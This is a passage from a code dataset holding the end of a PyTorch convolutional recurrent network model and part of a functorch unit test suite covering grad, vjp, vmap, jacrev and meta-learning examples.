3), (1, 2)),\r\n nn.BatchNorm2d(128),\r\n nn.ELU(),\r\n )\r\n # 128 x T+1 x 9\r\n # 128 x T x 9\r\n self.deconv4 = nn.Sequential(\r\n nn.ConvTranspose2d(128 * 2, 64, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(64),\r\n nn.ELU(),\r\n )\r\n # 64 x T+1 x 19\r\n # 64 x T x 19\r\n self.deconv3 = nn.Sequential(\r\n nn.ConvTranspose2d(64 * 2, 32, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(32),\r\n nn.ELU(),\r\n )\r\n # 32 x T+1 x 39\r\n # 32 x T x 39\r\n self.deconv2 = nn.Sequential(\r\n nn.ConvTranspose2d(32 * 2, 16, (2, 3), (1, 2), output_padding=(0, 1)),\r\n nn.BatchNorm2d(16),\r\n nn.ELU(),\r\n )\r\n # 16 x T+1 x 80\r\n # 16 x T x 80\r\n self.deconv1 = nn.Sequential(\r\n nn.ConvTranspose2d(16 * 2, 1, (2, 3), (1, 2)),\r\n # nn.BatchNorm2d(1),\r\n # nn.Softplus(),\r\n )\r\n # 16 x T+1 x 161\r\n # 16 x T x 161\r\n\r\n def forward(self, input):\r\n x = input.unsqueeze(1)\r\n c1 = self.conv1(x)\r\n c2 = self.conv2(c1)\r\n c3 = self.conv3(c2)\r\n c4 = self.conv4(c3)\r\n c5 = self.conv5(c4)\r\n bb, cc, tt, dd = c5.size()\r\n lstm_in = c5.permute(0, 2, 1, 3).contiguous().view(bb, tt, cc * dd)\r\n h0 = torch.zeros(2, x.size(0), 1024).to(x)\r\n c0 = torch.zeros(2, x.size(0), 1024).to(x)\r\n lstm_out, _ = self.lstm(lstm_in, (h0, c0))\r\n fc_in = lstm_out.contiguous().view(bb*tt, 1024)\r\n fc_out = self.fc(fc_in)\r\n d5 = fc_out.view(bb, tt, cc, dd).contiguous().permute(0, 2, 1, 3)\r\n d4 = self.deconv5(torch.cat([d5, c5], 1))\r\n d4 = d4[:, :, 1:, :]\r\n d3 = self.deconv4(torch.cat([d4, c4], 1))\r\n d3 = d3[:, :, 1:, :]\r\n d2 = self.deconv3(torch.cat([d3, c3], 1))\r\n d2 = d2[:, :, 1:, :]\r\n d1 = self.deconv2(torch.cat([d2, c2], 1))\r\n d1 = d1[:, :, 1:, :]\r\n out = self.deconv1(torch.cat([d1, c1], 1))\r\n out = out[:, :, 1:, :]\r\n return out.squeeze(1)\r\n","sub_path":"models/Tan2018PowCRN_bak.py","file_name":"Tan2018PowCRN_bak.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"636648208","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom torch.testing._internal.common_utils import TestCase, run_tests\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport textwrap\nimport unittest\nimport warnings\nimport math\nfrom typing import Callable, Type\nfrom torch.testing._internal.common_device_type import instantiate_device_type_tests, \\\n skipCUDAIfNoMagma, onlyCPU\nfrom functools import partial\n\nimport functorch\nfrom functorch import (\n grad, vjp, vmap, jacrev, grad_and_value,\n make_functional, make_functional_with_buffers,\n functional_init, functional_init_with_buffers,\n)\n\n# NB: numpy is a testing dependency!\nimport numpy as np\n\nUSE_TORCHVISION = False\ntry:\n import torchvision\n USE_TORCHVISION = True\nexcept ImportError:\n warnings.warn(\"Couldn't import torchvision. Some of our tests use it, try \"\n \"to install it with commands from pytorch.org, post-fixed with \"\n \"`--no-deps` to avoid overwriting the pytorch installation\",\n UserWarning)\n\n\nclass TestGradTransform(TestCase):\n def test_primitive(self, device):\n x = torch.randn([], device=device)\n result = grad(torch.sin)(x)\n self.assertEqual(result, torch.cos(x))\n\n def test_composite_simple(self, device):\n x = torch.randn(2, 3, 4, device=device)\n result = grad(lambda x: torch.flatten(x).sum())(x)\n self.assertEqual(result, torch.ones_like(x))\n\n def test_fn_with_kwargs(self, device):\n def foo(x, y):\n return (x * y).sum()\n\n x = torch.randn(3, device=device)\n y = torch.randn(3, device=device)\n expected = grad(foo)(x, y)\n result = grad(foo)(x, y=y)\n self.assertEqual(result, expected)\n\n def test_composite_complicated(self, device):\n x = torch.randn(3, device=device)\n y = torch.randn(3, 5, device=device)\n\n def foo(x, y):\n result = x @ y\n return result.sum()\n\n result = grad(foo)(x, y)\n\n x.requires_grad_()\n out = foo(x, y)\n expected, = torch.autograd.grad(out, x)\n\n self.assertEqual(result, expected)\n\n def test_composite_two_ops(self, device):\n N, C = 2, 5\n y = torch.randn(N, C, device=device)\n targets = torch.randint(0, C, (N,), device=device)\n\n def foo(y, targets):\n return F.cross_entropy(y, targets)\n\n result = grad(foo)(y, targets)\n\n y.requires_grad_()\n expected, = torch.autograd.grad(foo(y, targets), y)\n\n self.assertEqual(result, expected)\n\n def _test_attributes(self, get_attr_lambda, device):\n x = torch.randn(2, 3, 5, dtype=torch.double, device=device)\n expected = get_attr_lambda(x)\n\n def foo(x):\n self.assertEqual(get_attr_lambda(x), expected)\n return x.sum()\n\n grad(foo)(x)\n\n def test_shape(self, device):\n self._test_attributes(lambda x: x.shape, device)\n\n def test_dtype(self, device):\n self._test_attributes(lambda x: x.dtype, device)\n\n def test_is_cuda(self, device):\n self._test_attributes(lambda x: x.is_cuda, device)\n\n def test_numel(self, device):\n self._test_attributes(lambda x: x.numel(), device)\n\n def test_inplace(self, device):\n x = torch.randn([], device=device)\n\n def foo(x):\n return x.clone().sin_()\n\n result = grad(foo)(x)\n self.assertEqual(result, x.cos())\n\n def test_inplace_on_view(self, device):\n x = torch.randn(3, device=device)\n\n def foo(x):\n y = x.clone()\n y0 = y[0]\n y0.sin_()\n return y.sum()\n\n result = grad(foo)(x)\n\n x.requires_grad_()\n out = foo(x)\n expected, = torch.autograd.grad(out, x)\n\n self.assertEqual(result, expected)\n\n def test_inplace_on_view_base(self, device):\n x = torch.randn(3, device=device)\n\n def foo(x):\n y = x.clone()\n y0 = y[0]\n y.sin_()\n return y0\n\n result = grad(foo)(x)\n\n x.requires_grad_()\n out = foo(x)\n expected, = torch.autograd.grad(out, x)\n\n self.assertEqual(result, expected)\n\n def test_nesting_simple(self, device):\n x = torch.randn([], device=device)\n result = grad(grad(torch.sin))(x)\n self.assertEqual(result, -torch.sin(x))\n\n def test_escaped_wrappers_are_marked_as_dead(self, device):\n x = torch.randn([], device=device)\n escaped = []\n def foo(x):\n y = x.sin()\n escaped.append(y)\n return y\n\n result = grad(foo)(x)\n self.assertEqual(functorch._C.dlevel(escaped[0]), -1)\n\n def test_escaped_wrappers_are_ignored(self, device):\n x = torch.randn([], device=device)\n escaped = []\n def foo(x):\n y = x.sin()\n escaped.append(y)\n return y\n\n result = grad(foo)(x)\n\n something = escaped[0].sum()\n self.assertEqual(functorch._C.dlevel(something), 0)\n self.assertEqual(something, x.sin().sum())\n\n def test_vjp(self, device):\n x = torch.randn([], device=device)\n out, vjp_fn = vjp(torch.sin, x)\n self.assertEqual(out, x.sin())\n\n v = torch.randn([], device=device)\n result, = vjp_fn(v)\n self.assertEqual(result, v * x.cos())\n\n def test_vjp_two_outputs(self, device):\n def f(x):\n return x, x\n result, vjp_fn = vjp(f, torch.tensor(1.))\n vjp_fn(result)\n\n def test_composed_with_autograd(self, device):\n x = torch.randn([], requires_grad=True, device=device)\n\n y = grad(torch.sin)(x)\n result, = torch.autograd.grad(y, x)\n self.assertEqual(result, -x.sin())\n\n def test_grad_of_vjp_composition(self, device):\n x = torch.randn([], device=device)\n y = torch.randn([], device=device)\n\n def foo(x, y):\n out, vjp_fn = vjp(torch.sin, x)\n return grad(lambda y: vjp_fn(y)[0])(y)\n\n result = foo(x, y)\n expected = x.cos()\n self.assertEqual(result, expected)\n\n def test_vjp_of_grad_composition(self, device):\n x = torch.randn([], device=device)\n y = torch.randn([], device=device)\n\n def foo(x, y):\n out, vjp_fn = vjp(grad(torch.sin), x)\n return vjp_fn(y)[0]\n\n result = foo(x, y)\n expected = -y * x.sin()\n self.assertEqual(result, expected)\n\n def test_grad_of_vjp_of_grad_composition(self, device):\n x = torch.randn([], device=device)\n y = torch.randn([], device=device)\n\n def foo(x, y):\n df, vjp_fn = vjp(grad(lambda x: -torch.cos(x)), x)\n return grad(lambda y: vjp_fn(y)[0])(y)\n\n result = foo(x, y)\n expected = x.cos()\n self.assertEqual(result, expected)\n\n def test_views(self, device):\n x = torch.randn([], requires_grad=True, device=device)\n y = torch.randn([], requires_grad=True, device=device)\n\n def silly_sin(x):\n x = x.view([])\n x = x.sin()\n return x\n\n def foo(x, y):\n z1 = grad(silly_sin)(x)\n z2 = torch.cos(y)\n return z1 + z2\n\n result = foo(x, y)\n grads = torch.autograd.grad(result, [x, y])\n self.assertEqual(grads[0], -x.sin())\n self.assertEqual(grads[1], -y.sin())\n\n def test_view_inplace_simple(self, device):\n def foo(x):\n x = x.clone()\n x.view([]).sin_()\n return x\n\n x = torch.randn([], requires_grad=True, device=device)\n result = grad(foo)(x)\n self.assertEqual(result, x.cos())\n\n def test_invalid_argnums(self, device):\n x = torch.randn([])\n y = torch.randn([])\n with self.assertRaisesRegex(RuntimeError, 'but only'):\n grad(torch.mul, argnums=-1)(x, y)\n with self.assertRaisesRegex(RuntimeError, 'but only'):\n grad(torch.mul, argnums=2)(x, y)\n with self.assertRaisesRegex(RuntimeError, 'int or Tuple'):\n grad(torch.mul, argnums=[0])(x, y)\n with self.assertRaisesRegex(RuntimeError, 'must be int'):\n grad(torch.mul, argnums=('0',))(x, y)\n\n def test_argnums(self, device):\n x = torch.randn([])\n y = torch.randn([])\n gx = grad(torch.mul, argnums=0)(x, y)\n self.assertEqual(gx, y)\n\n gy = grad(torch.mul, argnums=1)(x, y)\n self.assertEqual(gy, x)\n\n gx, = grad(torch.mul, argnums=(0,))(x, y)\n self.assertEqual(gx, y)\n\n gx, gy = grad(torch.mul, argnums=(0, 1))(x, y)\n self.assertEqual(gx, y)\n self.assertEqual(gy, x)\n\n def test_zero_grad(self, device):\n def f(x):\n return (x['a']**2.0).sum()\n inps = ({'a':torch.randn(10, device=device) + 3, 'b':torch.randn(10, device=device)})\n grads = grad(f)(inps)\n self.assertNotEqual(grads['a'].sum(), 0.0)\n self.assertEqual(grads['b'].sum(), 0.0)\n\n def test_unrelated_grad(self, device):\n x = torch.tensor(1., device=device)\n y = torch.tensor(2., device=device)\n\n def unrelated(x):\n return y\n\n result = grad(unrelated)(x)\n self.assertEqual(result, torch.zeros_like(x))\n\n def test_unrelated_vjp(self, device):\n x = torch.tensor(1., device=device)\n y = torch.tensor(2., device=device)\n v = torch.tensor(1., device=device)\n\n def unrelated(x):\n return y\n\n out, vjp_fn = vjp(unrelated, x)\n result = vjp_fn(v)\n expected = (torch.zeros_like(x),)\n self.assertEqual(result, expected)\n\n def test_unrelated_vjp_multiple_inputs_outputs(self, device):\n w = torch.tensor(3., device=device)\n x = torch.tensor(4., device=device)\n y = torch.tensor(2., device=device)\n v = torch.tensor(1., device=device)\n\n def unrelated(w, x):\n return y, y, x\n\n out, vjp_fn = vjp(unrelated, w, x)\n result = vjp_fn((v, v, v))\n expected = (torch.zeros_like(x), torch.ones_like(x))\n self.assertEqual(result, expected)\n\n # TODO: https://github.com/zou3519/functorch/issues/12\n @onlyCPU\n def test_unrelated_hessian(self, device):\n N = 5\n M = 3\n W = torch.randn(N, M, device=device)\n\n def f(x):\n return W @ x\n\n x = torch.randn(M)\n result = jacrev(jacrev(f))(x)\n expected = torch.zeros(N, M, M, device=device)\n self.assertEqual(result, expected)\n\n def test_vjp_pytree_input(self, device):\n def f(x):\n return x[0] * x[1][0]\n\n x = torch.randn([], device=device)\n v = torch.randn([], device=device)\n out, vjp_fn = vjp(f, (x, (x, x)))\n self.assertEqual(out, x * x)\n result = vjp_fn(v)\n self.assertEqual(result, ((x * v, (x * v, 0.)),))\n\n def test_vjp_pytree_output(self, device):\n def f(x):\n return x, (x, x)\n\n x = torch.randn([], device=device)\n v1 = torch.randn([], device=device)\n v2 = torch.randn([], device=device)\n v3 = torch.randn([], device=device)\n _, vjp_fn = vjp(f, x)\n result, = vjp_fn((v1, (v2, v3)))\n self.assertEqual(result, v1 + v2 + v3)\n\n def test_vjp_pytree_error(self, device):\n def f(x):\n return x, (x, x)\n\n x = torch.randn([], device=device)\n v1 = torch.randn([], device=device)\n v2 = torch.randn([], device=device)\n v3 = torch.randn([], device=device)\n _, vjp_fn = vjp(f, x)\n with self.assertRaisesRegex(RuntimeError, 'Expected pytree structure'):\n result, = vjp_fn(((v1, (v2, v3)),))\n\n def test_functional_init(self, device):\n class MLPClassifier(nn.Module):\n def __init__(self, hidden_dim=32, n_classes=2):\n super().__init__()\n self.hidden_dim = hidden_dim\n self.n_classes = n_classes\n\n self.fc1 = nn.Linear(2, self.hidden_dim)\n self.fc2 = nn.Linear(self.hidden_dim, self.n_classes)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.log_softmax(x, -1)\n return x\n\n B = 10\n weights, fn, _ = functional_init(MLPClassifier, (B,))(32, 2)\n inputs = torch.randn(B, 7, 2)\n vmap(fn)(weights, (inputs,))\n\n def test_functional_init_with_buffers(self, device):\n class MLPClassifier(nn.Module):\n def __init__(self, hidden_dim=32, n_classes=2):\n super().__init__()\n self.hidden_dim = hidden_dim\n self.n_classes = n_classes\n\n self.fc1 = nn.Linear(2, self.hidden_dim)\n self.bn = nn.BatchNorm1d(self.hidden_dim, affine=True)\n self.fc2 = nn.Linear(self.hidden_dim, self.n_classes)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.bn(x)\n x = self.fc2(x)\n x = F.log_softmax(x, -1)\n return x\n\n B = 10\n weights, buffers, fn, _, _ = \\\n functional_init_with_buffers(MLPClassifier, [B])(32, 2)\n inputs = torch.randn(B, 7, 2)\n vmap(fn)(weights, buffers, (inputs,))\n\n def test_advanced_indexing(self, device):\n def f(value):\n log_prob = torch.ones((), device=device)\n val = (torch.zeros(()) > 0)\n log_prob[val] = 0\n return value\n\n result = grad(f)(torch.randn((), device=device))\n self.assertEqual(result, torch.ones_like(result))\n\n def f2(value):\n value = value.clone()\n value[value > 0] = 0\n return value.sum()\n\n x = torch.randn(100, device=device)\n result = grad(f2)(x)\n self.assertEqual(result, (x <= 0).type_as(x))\n\n def test_tensor_ctor_inside_grad(self, device):\n def foo(x):\n return x * torch.tensor(2., device=device)\n\n x = torch.tensor(3.14, device=device)\n functorch.grad(foo)(x)\n\n @onlyCPU\n def test_tensor_print(self, device):\n x = torch.tensor(3.14, device=device)\n buf = None\n\n def foo(x):\n nonlocal buf\n buf = repr(x)\n return x\n\n grad(grad(foo))(x)\n expected = textwrap.dedent(\"\"\"\\\n GradTrackingTensor(lvl=3, value=\\\\\n GradTrackingTensor(lvl=2, value=\\\\\n tensor(3.1400)))\"\"\")\n self.assertEqual(buf, expected)\n\n\nclass TestVmapOfGrad(TestCase):\n def test_per_sample_grads_inplace_view(self, device):\n def compute_loss(weight, x, t):\n x = x.mm(weight)\n y = x.squeeze_(0)\n return (y - t).sum()\n\n weight = torch.randn(16, 2, device=device)\n x = torch.randn(64, 1, 16, device=device)\n t = torch.randn(64, 2, device=device)\n result = vmap(partial(grad(compute_loss), weight))(x, t)\n expected = [grad(compute_loss)(weight, x[i], t[i]) for i in range(64)]\n expected = torch.stack(expected)\n # TODO: Check if the rtol is a problem\n self.assertEqual(result, expected, atol=0, rtol=5e-4)\n\n def test_new_zeros_materializes_tensor(self, device):\n N = 3\n C = 5\n\n def foo(y, x):\n result = x.new_zeros((C,))\n result.copy_(y)\n return result.sum()\n\n x = torch.randn(N, device=device)\n y = torch.randn(N, C, device=device)\n result = vmap(grad(foo))(y, x)\n self.assertEqual(result, torch.ones_like(y))\n\n def test_new_empty_materializes_tensor(self, device):\n N = 3\n C = 5\n\n def foo(y, x):\n result = x.new_empty((C,))\n result.copy_(y)\n return result.sum()\n\n x = torch.randn(N, device=device)\n y = torch.randn(N, C, device=device)\n result = vmap(grad(foo))(y, x)\n self.assertEqual(result, torch.ones_like(y))\n\n def test_per_sample_grads_simple(self, device):\n def compute_loss(weight, x, t):\n y = x @ weight\n return ((y - t) ** 2).sum()\n\n weight = torch.randn(16, 2, device=device)\n x = torch.randn(64, 16, device=device)\n t = torch.randn(64, 2, device=device)\n result = vmap(partial(grad(compute_loss), weight))(x, t)\n expected = [grad(compute_loss)(weight, x[i], t[i]) for i in range(64)]\n expected = torch.stack(expected)\n # TODO: Check if the rtol is a problem\n self.assertEqual(result, expected, atol=0, rtol=5e-4)\n\n def test_per_sample_grads_embeddingnet(self, device):\n class SampleNet(nn.Module):\n def __init__(self, vocab_size: int):\n super().__init__()\n self.emb = nn.Embedding(vocab_size, 16)\n self.fc1 = nn.Linear(16, 16)\n self.fc2 = nn.Linear(16, 2)\n\n def forward(self, x):\n x = self.emb(x)\n x = torch.transpose(x, -1, -2)\n x = torch.mean(x, -1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n return x\n\n def name(self):\n return \"SampleNet\"\n\n # Create our inputs...\n vocab_size = 1000\n batch_shape = [64]\n words_per_sentence = 5\n data = torch.randint(0, vocab_size, (*batch_shape, words_per_sentence), device=device)\n targets = torch.randint(0, 1, (*batch_shape,), device=device)\n\n # Construct our module\n net = SampleNet(vocab_size).to(device=device)\n criterion = nn.CrossEntropyLoss()\n\n net_func, weights = make_functional(net)\n\n def compute_loss(weights, data, target):\n output = net_func(weights, data)\n result = criterion(output, target)\n return result\n\n expected = [grad(compute_loss)(weights, data[i], targets[i]) for i in range(64)]\n expected = zip(*expected)\n expected = tuple(torch.stack(shards) for shards in expected)\n\n result = vmap(partial(grad(compute_loss), weights))(data, targets)\n for r, e in zip(result, expected):\n # TODO: Check if the rtol is a problem\n self.assertEqual(r, e, atol=0, rtol=1e-4)\n\n def test_log_softmax(self, device):\n x = torch.randn(3, 5)\n v = torch.randn(5)\n\n def foo(x, v):\n _, vjp_fn = vjp(partial(torch.log_softmax, dim=-1), x)\n return vjp_fn(v)[0]\n\n result = vmap(foo, (0, None))(x, v)\n\n v = v.expand_as(x)\n x.requires_grad_()\n output = torch.log_softmax(x, dim=-1)\n output.backward(v)\n self.assertEqual(result, x.grad)\n\n\nclass TestJacrev(TestCase):\n def test_simple(self, device):\n x = torch.randn(3, device=device)\n y = jacrev(torch.sin)(x)\n expected = torch.diagflat(x.cos())\n assert torch.allclose(y, expected)\n\n def test_simple_not_flat(self, device):\n x = torch.randn(2, 3, device=device)\n y = jacrev(torch.sin)(x)\n expected = torch.diagflat(x.view(-1).cos())\n expected = expected.view(2, 3, 2, 3)\n assert torch.allclose(y, expected)\n\n def test_vmap_on_jacrev_simple(self, device):\n x = torch.randn(2, 3, device=device)\n y = vmap(jacrev(torch.sin))(x)\n expected = torch.stack([torch.diagflat(x[i].cos()) for i in range(2)])\n assert torch.allclose(y, expected)\n\n def test_hessian_simple(self, device):\n def foo(x):\n return x.sin().sum()\n\n x = torch.randn(3, device=device)\n y = jacrev(jacrev(foo))(x)\n expected = torch.diagflat(-x.sin())\n assert torch.allclose(y, expected)\n\n def test_multiple_args(self, device):\n x = torch.randn(3, device=device)\n y = torch.randn(3, device=device)\n z = jacrev(torch.multiply, argnums=1)(x, y)\n expected = torch.diagflat(x)\n assert torch.allclose(z, expected)\n\n def test_argnums_tuple(self, device):\n x = torch.randn(3, device=device)\n y = torch.randn(3, device=device)\n z = jacrev(torch.multiply, argnums=(0, 1))(x, y)\n expected0 = torch.diagflat(y)\n expected1 = torch.diagflat(x)\n assert len(z) == 2\n assert torch.allclose(z[0], expected0)\n assert torch.allclose(z[1], expected1)\n \n def test_empty_argnums(self, device):\n x = torch.randn(3, device=device)\n with self.assertRaisesRegex(RuntimeError, \"must be non-empty\"):\n z = jacrev(torch.sin, argnums=())(x)\n\n def test_out_of_bounds_argnums(self, device):\n x = torch.randn(3, device=device)\n with self.assertRaisesRegex(RuntimeError, \"only 1 positional inputs\"):\n z = jacrev(torch.sin, argnums=2)(x)\n\n def test_negative_argnums(self, device):\n x = torch.randn(3, device=device)\n with self.assertRaisesRegex(RuntimeError, \"only 1 positional inputs\"):\n z = jacrev(torch.sin, argnums=-1)(x)\n\n def test_repeated_argnums(self, device):\n x = torch.randn(3, device=device)\n with self.assertRaisesRegex(RuntimeError, \"must be unique\"):\n z = jacrev(torch.sin, argnums=(0,0))(x)\n\n\nclass TestComposability(TestCase):\n def test_grad_grad(self, device):\n x = torch.randn([], device=device)\n y = grad(grad(torch.sin))(x)\n self.assertEqual(y, -x.sin())\n\n def test_grad_vmap(self, device):\n def foo(x):\n y = vmap(torch.sin)(x)\n return y.sum()\n\n x = torch.randn(3)\n y = grad(foo)(x)\n self.assertEqual(y, x.cos())\n\n def test_grad_vjp(self, device):\n x = torch.randn(3, device=device)\n\n def foo(x):\n _, vjp_fn = vjp(torch.sin, x)\n return vjp_fn(x)[0].sum()\n\n y = grad(foo)(x)\n expected = grad(lambda x: (x * x.cos()).sum())(x)\n self.assertEqual(y, expected)\n\n def test_vmap_grad(self, device):\n x = torch.randn(3, device=device)\n y = vmap(grad(torch.sin))(x)\n self.assertEqual(y, x.cos())\n\n def test_vmap_vmap(self, device):\n x = torch.randn(2, 3, device=device)\n y = vmap(vmap(torch.sin))(x)\n self.assertEqual(y, x.sin())\n\n def test_vmap_vjp(self, device):\n x = torch.randn(3, device=device)\n _, vjp_fn = vjp(torch.sin, x)\n\n def foo(x):\n _, vjp_fn = vjp(torch.sin, x)\n return vjp_fn(x)\n\n y = vmap(foo)(x)\n self.assertEqual(y, vjp_fn(x))\n\n # TODO: there's a very interesting error message when the following\n # is on CPU\n xs = torch.randn(5, 3, device=device)\n expected = torch.stack([vjp_fn(x)[0] for x in xs])\n result = vmap(lambda x: vjp_fn(x)[0])(xs)\n self.assertEqual(result, expected)\n\n def test_vjp_grad(self, device):\n x = torch.randn([], device=device)\n y, vjp_fn = vjp(grad(torch.sin), x)\n self.assertEqual(y, x.cos())\n\n v = torch.randn([])\n self.assertEqual(vjp_fn(v)[0], -x.sin() * v)\n\n def test_vjp_vmap(self, device):\n x = torch.randn(3, device=device)\n y, vjp_fn = vjp(vmap(torch.sin), x)\n self.assertEqual(y, x.sin())\n\n v = torch.randn(3, device=device)\n self.assertEqual(vjp_fn(v)[0], x.cos() * v)\n\n def test_vjp_vjp(self, device):\n x = torch.randn(3, device=device)\n y, vjp_fn = vjp(torch.sin, x)\n self.assertEqual(y, x.sin())\n\n y, vjp_fn = vjp(lambda x: vjp_fn(x)[0], x)\n self.assertEqual(y, x * x.cos())\n\n y = vjp_fn(x)[0]\n # Honestly IDK what the result here is... but at least it runs\n\n\nclass TestExamplesCorrectness(TestCase):\n def test_maml_regression(self, device):\n class ThreeLayerNet(nn.Module):\n def __init__(self):\n super(ThreeLayerNet, self).__init__()\n self.fc1 = nn.Linear(1, 40)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(40, 40)\n self.relu2 = nn.ReLU()\n self.fc3 = nn.Linear(40, 1)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.relu1(x)\n x = self.fc2(x)\n x = self.relu2(x)\n x = self.fc3(x)\n return x\n\n # The prototype doesn't like F.mse_loss.\n def mse_loss(x, y):\n return torch.mean((x - y) ** 2)\n\n net, params = make_functional(ThreeLayerNet().to(device))\n K = 20\n losses = []\n num_tasks = 4\n alpha = 0.1\n\n def sample_tasks(outer_batch_size, inner_batch_size):\n # Select amplitude and phase for the task\n As = []\n phases = []\n for _ in range(outer_batch_size):\n As.append(np.random.uniform(low=0.1, high=.5))\n phases.append(np.random.uniform(low=0., high=np.pi))\n def get_batch():\n xs, ys = [], []\n for A, phase in zip(As, phases):\n x = np.random.uniform(low=-5., high=5., size=(inner_batch_size, 1))\n y = A * np.sin(x + phase)\n xs.append(x)\n ys.append(y)\n return torch.tensor(xs, dtype=torch.float, device=device), \\\n torch.tensor(ys, dtype=torch.float, device=device)\n x1, y1 = get_batch()\n x2, y2 = get_batch()\n return x1, y1, x2, y2\n\n def get_loss_for_task(use_transform, x1, y1, x2, y2):\n def inner_loss(params, x1, y1):\n f = net(params, x1)\n loss = mse_loss(f, y1)\n return loss\n\n if use_transform:\n grads = grad(inner_loss)(params, x1, y1)\n else:\n loss = inner_loss(params, x1, y1)\n grads = torch.autograd.grad(loss, params, create_graph=True)\n new_params = [(params[i] - alpha*grads[i]) for i in range(len(params))]\n\n v_f = net(new_params, x2)\n return mse_loss(v_f, y2)\n\n task = sample_tasks(num_tasks, K)\n\n # Compute with vmap+grad\n inner_losses = vmap(partial(get_loss_for_task, True))\\\n (task[0], task[1], task[2], task[3])\n loss2 = sum(inner_losses)/len(inner_losses)\n result_grads = torch.autograd.grad(loss2, params)\n\n # Compute without vmap+grad\n inner_losses = [\n get_loss_for_task(False, task[0][i], task[1][i], task[2][i], task[3][i])\n for i in range(num_tasks)\n ]\n loss2 = sum(inner_losses)/len(inner_losses)\n expected_grads = torch.autograd.grad(loss2, params)\n\n self.assertEqual(result_grads, expected_grads)\n\n def test_maml_omniglot(self, device):\n # TODO: there appears to be precision issues for float32\n dtype = torch.double\n\n # TODO: The prototype doesn't support in-place relu (and some other\n # in-place operations. That can be fixed.)\n inplace_relu = False\n n_way = 5\n n_inner_iter = 2\n num_tasks = 2\n class Flatten(nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n\n net = nn.Sequential(\n nn.Conv2d(1, 64, 3),\n nn.BatchNorm2d(64, momentum=1, affine=True),\n nn.ReLU(inplace=inplace_relu),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(64, 64, 3),\n nn.BatchNorm2d(64, momentum=1, affine=True),\n nn.ReLU(inplace=inplace_relu),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(64, 64, 3),\n nn.BatchNorm2d(64, momentum=1, affine=True),\n nn.ReLU(inplace=inplace_relu),\n nn.MaxPool2d(2, 2),\n Flatten(),\n nn.Linear(64, n_way)).to(device).to(dtype)\n\n fnet, params, buffers = make_functional_with_buffers(net)\n net = (params, buffers, fnet)\n\n def loss_for_task(net, n_inner_iter, use_transform, x_spt, y_spt, x_qry, y_qry):\n params, buffers, fnet = net\n querysz = x_qry.size(0)\n\n def compute_loss(new_params, buffers, x, y):\n logits = fnet(new_params, buffers, x)\n loss = F.cross_entropy(logits, y)\n return loss\n\n new_params = params\n for _ in range(n_inner_iter):\n if use_transform:\n grads = grad(compute_loss)(new_params, buffers, x_spt, y_spt)\n else:\n res = compute_loss(new_params, buffers, x_spt, y_spt)\n grads = torch.autograd.grad(res, new_params, create_graph=True)\n new_params = [p - g * 1e-1 for p, g, in zip(new_params, grads)]\n\n qry_logits = fnet(new_params, buffers, x_qry)\n qry_loss = F.cross_entropy(qry_logits, y_qry)\n qry_acc = (qry_logits.argmax(\n dim=1) == y_qry).sum() / querysz\n\n return qry_loss, qry_acc\n\n # Get some sample inputs...\n x_spt = torch.randn(num_tasks, 25, 1, 28, 28, dtype=dtype, device=device)\n y_spt = torch.randint(0, 5, (num_tasks, 25), device=device)\n x_qry = torch.randn(num_tasks, 75, 1, 28, 28, dtype=dtype,device=device)\n y_qry = torch.randint(0, 5, (num_tasks, 75), device=device)\n\n # compute with vmap + grad\n compute_loss = partial(loss_for_task, net, n_inner_iter, True)\n qry_losses, _ = vmap(compute_loss)(x_spt, y_spt, x_qry, y_qry)\n result_grads = torch.autograd.grad(qry_losses.sum(), params)\n\n # compute without vmap + grad\n compute_loss = partial(loss_for_task, net, n_inner_iter, False)\n losses = [compute_loss(x_spt[i], y_spt[i], x_qry[i], y_qry[i])[0]\n for i in range(num_tasks)]\n expected_grads = torch.autograd.grad(sum(losses), params)\n\n self.assertEqual(result_grads, expected_grads)\n\n def test_lennard_jones_batched_jacrev(self, device):\n sigma = 0.5\n epsilon = 4.\n\n def lennard_jones(r):\n return epsilon * ((sigma / r)**12 - (sigma / r)**6)\n\n def lennard_jones_force(r):\n \"\"\"Get magnitude of LJ force\"\"\"\n return \\\n -epsilon * ((-12 * sigma**12 / r**13) + (6 * sigma**6 / r**7))\n\n r = torch.linspace(0.5, 2 * sigma, requires_grad=True)\n drs = torch.outer(r, torch.tensor([1.0, 0, 0]))\n norms = torch.norm(drs, dim=1).reshape(-1, 1)\n training_energies = \\\n torch.stack(list(map(lennard_jones, norms))).reshape(-1, 1)\n training_forces = torch.stack(\n [force * dr\n for force, dr in zip(map(lennard_jones_force, norms), drs)])\n\n model = nn.Sequential(\n nn.Linear(1, 16),\n nn.Tanh(),\n nn.Linear(16, 16),\n nn.Tanh(),\n nn.Linear(16, 16),\n nn.Tanh(),\n nn.Linear(16, 16),\n nn.Tanh(),\n nn.Linear(16, 1)\n )\n\n def make_prediction(model, drs, use_functorch):\n norms = torch.norm(drs, dim=1).reshape(-1, 1)\n energies = model(norms)\n\n if use_functorch:\n network_derivs = vmap(jacrev(model))(norms).squeeze(-1)\n forces = -network_derivs * drs / norms\n else:\n forces = []\n for r, dr in zip(norms, drs):\n network_deriv = torch.autograd.functional.jacobian(\n model, r, create_graph=True)\n force = -network_deriv * dr / r\n forces.append(force)\n forces = torch.cat(forces)\n return energies, forces\n\n def loss_fn(energies, forces, predicted_energies, predicted_forces):\n return F.mse_loss(energies, predicted_energies) + \\\n 0.01 * F.mse_loss(forces, predicted_forces) / 3\n\n energies, forces = make_prediction(model, drs, use_functorch=True)\n loss = loss_fn(training_energies, training_forces, energies, forces)\n result = torch.autograd.grad(loss, model.parameters())\n\n energies, forces = make_prediction(model, drs, use_functorch=False)\n loss 